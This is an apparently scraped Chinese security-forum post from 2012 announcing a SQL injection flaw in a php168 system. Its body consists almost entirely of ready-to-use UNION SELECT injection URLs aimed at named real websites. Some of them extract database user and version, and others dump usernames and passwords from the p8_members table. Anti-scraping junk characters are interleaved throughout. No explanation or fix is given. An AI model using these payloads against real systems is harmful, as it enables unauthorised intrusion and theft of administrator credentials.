找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3116|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--/ {8 C: v# K, o
                                                         * K9 k0 ?$ {3 M; i
                                       
! H0 w4 E2 |1 v4 j' s" ?2 S  i; m0 `, A0 ?- }: z
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
4 o8 g$ ]  K' S5 K- v- I                                                     4 s2 u+ N- [& U: b
                                                                  
# P0 L8 d2 z7 L6 g4 [$ s1 M# I                                                        + x; I0 f& T+ t
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
! t9 e% D/ E  w, F# I! h4 }5 r, y: P5 o
1 ]  m% D. q2 a# F% @/ W' D
8 X# W1 ?) E1 t! G1 [5 {! C" Q
                                                            ! O: b3 e7 l6 t, i! {  S* N

2 `5 s1 w! z& j6 Khttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
! V/ J6 O0 K$ ?9 R1 h6 ?: B# b8 n5 K" t; C* k
7 h) n( ~, q2 Q8 s( ]; T3 C

9 H0 J) M) [/ h2 n4 S$ H! F                                                                    6 u) F% V3 n- ]" _$ K4 I

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表